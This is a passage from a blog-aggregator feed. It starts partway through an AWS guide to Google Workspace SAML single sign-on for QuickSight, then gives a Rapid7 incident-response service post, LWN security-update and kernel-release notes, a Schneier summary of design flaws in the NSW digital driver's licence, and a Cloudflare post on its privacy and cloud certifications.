  8. On the Attribute Mapping page, choose the Select field menu and map the following Google directory attributes to their corresponding Amazon Web Services attributes:

    Google Directory Attribute Amazon Web Services Attribute
    Basic Information > Primary Email https://aws.amazon.com/SAML/Attributes/RoleSessionName
    Amazon > Role https://aws.amazon.com/SAML/Attributes/Role

  1. Choose Finish.

Grant access to users in Google Workspace

When the SAML app is created in Google workspace, it’s turned off by default. This means for users logged in to their Google Workspace account, the SAML app isn’t visible to them. We now enable the AWS SAML app to your Google Workspace users.

  1. While logged in to the Google Admin console with admin credentials, navigate to the Web and mobile apps page.
  2. Choose Amazon Web Services.

  3. Choose User access.
  4. To turn on a service for everyone in your organization, choose ON for everyone.
  5. Choose Save.

If you don’t want to activate this application for all users, you can alternatively grant access to a subset of users by using Google Workspace organizational units.

Verify federated access to the QuickSight instance

To test your SAML 2.0-based authentication with QuickSight for users in your existing IDP (Google Workspace), complete the following steps:

  1. Open a new browser session, for example, using Chrome, in a new incognito window.
  2. Log in to your Google Workspace account (for the purpose of this demo, we use the Google Workspace admin account).
  3. Choose Amazon Web Services from the list of Google apps.

Conclusion

This post provided a step-by-step guide for configuring Google Workspace as your IdP, and using IAM roles to enable SSO to QuickSight. Now your users have a seamless sign-in experience to QuickSight and have the appropriate level of access related to their role.

Although this post demonstrated the integration of IAM and Google Workspace, you can replicate this solution using your choice of SAML 2.0 IdPs. For other supported federation options, see Using identity federation and single sign-on (SSO) with Amazon QuickSight.

To get answers to your questions related to QuickSight, refer to the QuickSight Community.

If you have any questions or feedback, please leave a comment.


About the Authors

Sriharsh Adari is a Senior Solutions Architect at Amazon Web Services (AWS), where he helps customers work backwards from business outcomes to develop innovative solutions on AWS. Over the years, he has helped multiple customers on data platform transformations across industry verticals. His core area of expertise include Technology Strategy, Data Analytics, and Data Science. In his spare time, he enjoys playing sports, binge-watching TV shows, and playing Tabla.

Srikanth Baheti is a Specialized World Wide Sr. Solution Architect for Amazon QuickSight. He started his career as a consultant and worked for multiple private and government organizations. Later he worked for PerkinElmer Health and Sciences & eResearch Technology Inc, where he was responsible for designing and developing high traffic web applications, highly scalable and maintainable data pipelines for reporting platforms using AWS services and Serverless computing.

DFIR Without Limits: Moving Beyond the “Sucker’s Choice” of Today’s Breach Response Services

Post Syndicated from Warwick Webb original https://blog.rapid7.com/2022/05/23/dfir-without-limits/

DFIR Without Limits: Moving Beyond the “Sucker's Choice” of Today’s Breach Response Services

Three-quarters of CEOs and their boards believe a major breach is “inevitable.” And those closest to the action? Like CISOs? They’re nearly unanimous.

Gartner is right there, too. Their 2021 Market Guide for Digital Forensics and Incident Response (DFIR) Services recommends you “operate under the assumption that security breaches will occur, the only variable factors being the timing, the severity, and the response requirements.”

When that breach happens, you’ll most likely need help. For Rapid7 MDR customers, we’re there for you when you need us, period. Our belief is that, if a breach is inevitable, then a logical, transparent, collaborative, and effective approach to response should be, too.

I’m not just talking about the table-stakes “response” to everyday security threats. I’m talking about digital forensics and world-class incident response for any incident – no matter if it’s a minor breach like a phishing email with an attached maldoc or a major targeted breach involving multiple endpoints compromised by an advanced attacker.

Protecting your environment is our shared responsibility. As long as you are willing and able to partner with us during and after the Incident Response process, we are here for you. Rapid7 does the DFIR heavy lift. You cooperate to eradicate the threat and work to improve your security posture as a result.

Unfortunately, that’s not how all of the market sees it.

How vendors typically provide DFIR

Some managed detection and response (MDR) vendors or managed security services providers (MSSPs) do understand that there’s an R in MDR. Typically, they’ll do a cursory investigation, validation and – if you’re lucky – some form of basic or automated response.

For most, that’s where the R stops. If they can’t handle an emergency breach response situation (or if you’re on your own without any DFIR on staff), you’ll wind up hiring a third-party incident response (IR) consulting service. This will be a service you’ve found, or one that’s required by your cyber insurance provider. Perhaps you planned ahead and pre-purchased an hourly IR retainer.

Either way, how you pay for IR determines your customer experience during “response.” It’s a model designed to maximize provider profits, not your outcomes.

At a glance

IR Consulting Services IR Included in Managed Services
Scope Unbounded Limited to managed services in-scope environments
Time Limit Capped by number of hours or number of incidents Capped by number of hours or number of incidents
Expertise Senior IR Consultants Capped by number of hours or number of incidents
24×7 IR No Yes
Tooling Often will deploy a separate tooling stack, without easy access to historical data Existing tooling, utilizing historical data but potentially lacking in forensic capability
Time to Respond Slower (limited by legal documents, SLAs, lack of familiarity in the customer environment, time for tool deployment) Faster (24×7, uses existing tools, multiple analysts)
Pricing Model Proactively purchased as a retainer or reactively on an hourly basis Included in purchase, up to an arbitrarily defined limit

There’s a good reason DFIR experts are reserved for expensive consulting services engagements. They’re a rare breed.

Most MDR teams can’t afford to staff the same DFIR experts that answer the Breach Response hotline. Security vendors price, package, and deliver these services in a way to reserve their more experienced (and expensive) experts for IR consulting.

Either you purchase Managed Services and expensive IR consulting hours (and play intermediary between these two separate teams), or you settle for “Incident Response lite” from your Managed Services SOC team.

If this seems like a “lesser of two evils” approach with two unappealing options, it is.

The future of incident response has arrived

Over a year ago, Rapid7 merged our Incident Response Consulting Team with our MDR SOC to ensure all MDR customers receive the same high-caliber DFIR expertise as a core capability of our service – no Breach Response hotlines or retainer hours needed.

This single, integrated team of Detection and Response experts started working together to execute on our response mission: early detection and rapid, highly effective investigation, containment, and eradication of threats.

Our SOC analysts are experts on alert triage, tuning, and threat hunting. They have the most up-to-date knowledge of attackers’ current tactics, techniques, and procedures and are extremely well-versed in attacker behavior, isolating malicious activity and stopping it in its tracks. When a minor incident is detected, our SOC analysts begin incident investigation – root cause analysis, malware reverse engineering, malicous code deobfuscation, and more – and response immediately. If the scope becomes large and complex, we (literally) swivel our chair to tap our IR reinforcements on the shoulder.

Senior IR consultants are seasoned DFIR practitioners. They’re also the experts leading the response to major breaches, directing investigation, containment, and eradication activities while clearly communicating with stakeholders on the status, scope, and impact of the incident.

Both teams benefit. The managed services SOC team has access to a world class Incident Response team. And the expert incident response consultants have a global team of (also world class) security analysts trained to assist with forensic investigation and response around the clock (including monitoring the compromised environment for new attacker activity).

Most importantly, our MDR customers benefit. This reimagining of how we work together delivers seamless, effective incident response for all. When every second counts, an organization cannot afford the limited response of most MDR providers, or the delay and confusion that comes with engaging a separate IR vendor.

Grab a coffee, it’s major breach story time

Here’s a real-life example of how our integrated approach works.

In early January, a new MDR client was finishing the onboarding process by installing the Insight Agent on their devices. Almost immediately upon agent installation, the MDR team noticed critical alerts flowing into InsightIDR (our unified SIEM and XDR solution).

Our SOC analysts dug in and realized this wasn’t a typical attack. The detections indicated a potential major incident, consistent with attacker behavior for ransomware. SOC analysts immediately used Active Response to quarantine the affected assets and initiated our incident response process.

The investigation transitioned to the IR team within minutes, and a senior IR consultant (from the same team responsible for leading breach response for Rapid7’s off-the-street or retainer customers) took ownership of the incident response engagement.

After assessing the early information provided by the SOC, the IR consultant identified the highest-priority investigation and response actions, taking on some of these tasks directly and assigning other tasks to additional IR consultants and SOC analysts. The objective: teamwork and speed.

The SOC worked around the clock together with the IR team to search these systems and identify traces of malicious activity. The team used already-deployed tools, such as InsightIDR and Velociraptor (Rapid7’s open-source DFIR tool).

This major incident was remediated and closed within three days of the initial alert, stopping the installation of ransomware within the customer’s environment and cutting out days and even weeks of back-and-forth between the customer, the MDR SOC team, and a third-party Breach Response team.

Now, no limits and a customer experience you’ll love

The results speak for themselves. Not only does the embedded IR model enable each team to reach beyond its traditional boundaries, it brings faster and smoother outcomes to our customers.

And now we’re taking this a step further.

Previously, our MDR services included up to two “uncapped” (no limit on IR team time and resources) Remote Incident Response engagements per year. While this was more than enough for most customers (and highly unusual for an MDR provider), we realized that imposing any arbitrary limits on DFIR put unnecessary constraints on delivering on our core mission.

For this reason, we have removed the Remote Incident Response limits from our MDR service across all tiers. Rapid7 will now respond to ALL incidents within our MDR customers’ in-scope environments, regardless of incident scope and complexity, and bring all the necessary resources to bear to effectively investigate, contain and eradicate these threats.

Making these DFIR engagements – often reserved for breach response retainer customers – part of the core MDR service (not just providing basic response or including hours for a retainer) just raised the “best practices” bar for the industry.

It’s not quite unlimited, but it’s close. The way we see it, we’ll assist with the hard parts of DFIR, while you partner with us to eradicate the threat and implement corrective actions. That partnership is key: Implementing required remediation, mitigation, and corrective actions will help to reduce the likelihood of incident recurrence and improve your overall security posture.

After all, that’s what MDR is all about.

P.S.: If you’re a security analyst or incident responder, we’re hiring!

In addition to providing world-class breach response services to our MDR customers, this new approach makes Rapid7 a great place to work and develop new skills.

Our SOC analysts develop their breach response expertise by working shoulder-to-shoulder with our Incident Response team. And our IR team focuses on doing what they love – not filling out time cards and stressing over their “utilization” as consultants, but leading the response to complex, high-impact breaches and being there for our customers when they need us the most. Plus, with the support and backing of a global SOC, our IR team can actually sleep at night!

Despite the worldwide cybersecurity skills crisis and The Great Resignation sweeping the industry, Rapid7’s MDR team grew by 30% last year with only 5% voluntary analyst turnover – in line with our last three years.

Part of this exceptionally low turnover is due to:

  • Investment in continuing education, diversity, and employee retention benefits
  • A robust training program, clear career progression, the opportunity to level up skills by teaming with IR mentors, and flexibility for extra-curricular “passion project” work (to automate processes and improve aspects of MDR services)
  • Competitive pay, and a focus on making sure analysts are doing work they enjoy day in and day out with a healthy work-life balance (there’s no such thing as a “night shift” since we use a follow-the-sun SOC model)

If you’re a Security Analyst or Incident Responder looking for a new challenge, come join our herd. I think Jeremiah Dewey, VP of Rapid7’s Managed Services, said it best:

“Work doesn’t have to be a soul-sucking, boring march to each Friday. You can follow your passion, have fun in what you’re doing, and be successful in growing your career and growing as a human being.”

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/896032/

Security updates have been issued by Debian (admesh, condor, firefox-esr, libpgjava, libxml2, rsyslog, and thunderbird), Fedora (dotnet6.0, libarchive, php-openpsa-universalfeedcreator, thunderbird, and vim), Mageia (ffmpeg, kernel, kernel-linus, microcode, netatalk, nvidia-current, nvidia390, opencontainers-runc, postgresql, and ruby-nokogiri), Slackware (mariadb and mozilla), and SUSE (curl, firefox, libarchive, librecad, libxls, openldap2, php7, and postgresql10).

Forging Australian Driver’s Licenses

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/05/forging-australian-drivers.html

The New South Wales digital driver’s license has multiple implementation flaws that allow for easy forgeries.

This file is encrypted using AES-256-CBC encryption combined with Base64 encoding.

A 4-digit application PIN (which gets set during the initial onboarding when a user first instals the application) is the encryption password used to protect or encrypt the licence data.

The problem here is that an attacker who has access to the encrypted licence data (whether that be through accessing a phone backup, direct access to the device or remote compromise) could easily brute-force this 4-digit PIN by using a script that would try all 10,000 combinations….

[…]

The second design flaw that is favourable for attackers is that the Digital Driver Licence data is never validated against the back-end authority which is the Service NSW API/database.

This means that the application has no native method to validate the Digital Driver Licence data that exists on the phone and thus cannot perform further actions such as warn users when this data has been modified.

As the Digital Licence is stored on the client’s device, validation should take place to ensure the local copy of the data actually matches the Digital Driver’s Licence data that was originally downloaded from the Service NSW API.

As this verification does not take place, an attacker is able to display the edited data on the Service NSW application without any preventative factors.

There’s a lot more in the blog post.

Cloudflare achieves key cloud computing certifications — and there’s more to come

Post Syndicated from Rory Malone original https://blog.cloudflare.com/iso-27018-second-privacy-certification-and-c5/

Cloudflare achieves key cloud computing certifications — and there’s more to come

Cloudflare achieves key cloud computing certifications — and there’s more to come

Back in the early days of the Internet, you could physically see the hardware where your data was stored. You knew where your data was and what kind of locks and security protections you had in place. Fast-forward a few decades, and data is all “in the cloud”. Now, you have to trust that your cloud services provider is putting security precautions in place just as you would have if your data was still sitting on your hardware. The good news is, you don’t have to merely trust your provider anymore. There are a number of ways a cloud services provider can prove it has robust privacy and security protections in place.

Today, we are excited to announce that Cloudflare has taken three major steps forward in proving the security and privacy protections we provide to customers of our cloud services: we achieved a key cloud services certification, ISO/IEC 27018:2019; we completed our independent audit and received our Cloud Computing Compliance Criteria Catalog (“C5”) attestation; and we have joined the EU Cloud Code of Conduct General Assembly to help increase the impact of the trusted cloud ecosystem and encourage more organizations to adopt GDPR-compliant cloud services.

Cloudflare has been committed to data privacy and security since our founding, and it is important to us that we can demonstrate these commitments. Certification provides assurance to our customers that a third party has independently verified that Cloudflare meets the requirements set out in the standard.

ISO/IEC 27018:2019 – Cloud Services Certification

2022 has been a big year for people who like the number ‘two’. February marked the second when the 22nd Feb 2022 20:22:02 passed: the second second of the twenty-second minute of the twentieth hour of the twenty-second day of the second month, of the year twenty-twenty-two! As well as the date being a palindrome — something that reads the same forwards and backwards — on an vintage ‘80s LCD clock, the date and time could be written as an ambigram too — something that can be read upside down as well as the right way up:

Cloudflare achieves key cloud computing certifications — and there’s more to come

When we hit 2022 02 22, our team was busy completing our second annual audit to certify to ISO/IEC 27701:2019, having been one of the first organizations in our industry to have achieved this new ISO privacy certification in 2021, and the first Internet performance & security company to be certified to it. And now Cloudflare has now been certified to a second international privacy standard related to the processing of personal data — ISO/IEC 27018:2019.1

ISO 27018 is a privacy extension to the widespread industry standards ISO/IEC 27001 and ISO/IEC 27002, which describe how to establish and run an Information Security Management System. ISO 27018 extends the standards into a code of practice for how any personal information should be protected when processed in a public cloud, such as Cloudflare’s.

What does ISO 27018 mean for Cloudflare customers?

Put simply, with Cloudflare’s certifications to both ISO 27701 and ISO 27018, customers can be assured that Cloudflare both has a privacy program that meets GDPR-aligned industry standards and also that Cloudflare protects the personal data processed in our network as part of that privacy program.

These certifications, in addition to the Data Processing Addendum (“DPA”) we make available to our customers, offer our customers multiple layers of assurance that any personal data that Cloudflare processes on their behalf will be handled in a way that meets the GDPR’s requirements.

The ISO 271018 standard contains enhancements to existing ISO 27002 controls and an additional set of 25 controls identified for organizations that are personal data processors. Controls are essentially a set of best practices that processors must meet in terms of data handling practices and transparency about those practices, protecting and encrypting the personal data processed, and handling data subject rights, among others. As an example, one of the ISO 27018 requirements is:

Where the organization is contracted to process personal data, that personal data may not be used for the purpose of marketing and advertising without establishing that prior consent was obtained from the appropriate data subject. Such consent shall not be a condition for receiving the service.

When Cloudflare acts as a data processor for our customers’ data, that data (and any personal data it may contain) belongs to our customers, not to us. Cloudflare does not track our customers’ end users for marketing or advertising purposes, and we never will. We even went beyond what the ISO control required and added this commitment to our customer DPA:

“… Cloudflare shall not use the Personal Data for the purposes of marketing or advertising…”
– 3.1(b), Cloudflare Data Protection Addendum

Cloudflare achieves ISO 27018:2019 Certification

For ISO 27018, Cloudflare was assessed by a third-party auditor, Schellman, between December 2021 and February 2022. Certifying to an ISO privacy standard is a multi-step process that includes an internal and an external audit, before finally being certified against the standard by the independent auditor. Cloudflare’s new single joint certificate, covering ISO 27001:2013, ISO 27018:2019, and ISO 27701:2019 is now available to download from the Cloudflare Dashboard.

Cloudflare achieves key cloud computing certifications — and there’s more to come

C5:2020 – Cloud Computing Compliance Criteria Catalog

ISO 27108 isn’t all we’re announcing: as we blogged in February, Cloudflare has also been undergoing a separate independent audit for the Cloud Computing Compliance Criteria Catalog certification — also known as C5 — which was introduced by the German government’s Federal Office for Information Security (“BSI”) in 2016 and updated in 2020. C5 evaluates an organization’s security program against a standard of robust cloud security controls. Both German government agencies and private companies place a high level of importance on aligning their cloud computing requirements with these standards. Learn more about C5 here.

Today, we’re excited to announce that we have completed our independent audit and received our C5 attestation from our third-party auditors. The C5 attestation report is now available  to download from the Cloudflare Dashboard.

And we’re not done yet…

When the European Union’s benchmark-setting General Data Protection Regulation (“GDPR”) was adopted four years ago this week, Article 40 encouraged:

“…the drawing up of codes of conduct intended to contribute to the proper application of this Regulation, taking account of the specific features of the various processing sectors and the specific needs of micro, small and medium-sized enterprises.”

The first code officially approved as GDPR-compliant by the EU one year ago this past weekend is ‘The EU Cloud Code of Conduct’. This code is designed to help cloud service providers demonstrate the protections they provide for the personal data they process on behalf of their customers. It covers all cloud service layers, and its compliance is overseen by accredited monitoring body SCOPE Europe. Initially, cloud service providers join as members of the code’s General Assembly, and then the second step is to undergo an audit to validate their adherence to the code.

Today, we are pleased to announce today that Cloudflare has joined the General Assembly of the EU Cloud Code of Conduct. We look forward to the second stage in this process, undertaking our audit and publicly affirming our compliance to the GDPR as a processor of personal data.

Cloudflare Certifications

Customers may now download a copy of Cloudflare’s certifications and reports from the Cloudflare Dashboard; new customers may request these from your sales representative. For the latest information about our certifications and reports, please visit our Trust Hub.


1The International Organization for Standardization (“ISO”) is an international, nongovernmental organization made up of national standards bodies that develops and publishes a wide range of proprietary, industrial, and commercial standards.

The 5.18 kernel has been released

Post Syndicated from original https://lwn.net/Articles/895969/

Linus has released the 5.18 kernel.
No unexpected nasty surprises this last week, so here we go with the
5.18 release right on schedule.
” Some of the headline changes in
this release include
the DAMOS memory-management interface,
a number of random-number-generator improvements,
the Intel software-defined silicon driver,
strict memcpy() bounds checking,
a switch to the C11 standard, and more.
Also, the Reiserfs filesystem has been
deprecated
and the last vestiges of a.out
support
have been removed.
See the LWN merge-window summaries (part 1, part 1) and the KernelNewbies 5.18 page
for more details.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close